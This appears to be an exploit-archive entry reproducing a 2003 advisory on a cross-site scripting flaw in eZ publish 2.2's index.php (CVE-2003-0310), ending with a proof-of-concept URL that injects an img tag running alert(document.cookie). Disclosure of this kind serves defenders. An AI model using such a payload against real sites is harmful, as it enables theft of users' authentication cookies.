EZ Publish 2.2 - 'index.php' IMG Tag Cross-Site Scripting

Author: Ferruh Mavituna
type: webapps
platform: php
port: 
date_added: 2003-05-16  
date_updated: 2012-11-10  
verified: 1  
codes: CVE-2003-0310;OSVDB-6554  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22607.txt  

source: https://www.securityfocus.com/bid/7616/info

A cross-site scripting vulnerability has been reported for eZ publish. Specifically, eZ publish does not sufficiently sanitize user-supplied input supplied to the 'index.php' script.

This may allow for theft of cookie-based authentication credentials and other attacks.

http://www.example.com/index.php/article/articleview/<img%20src="javascript:alert(document.cookie)">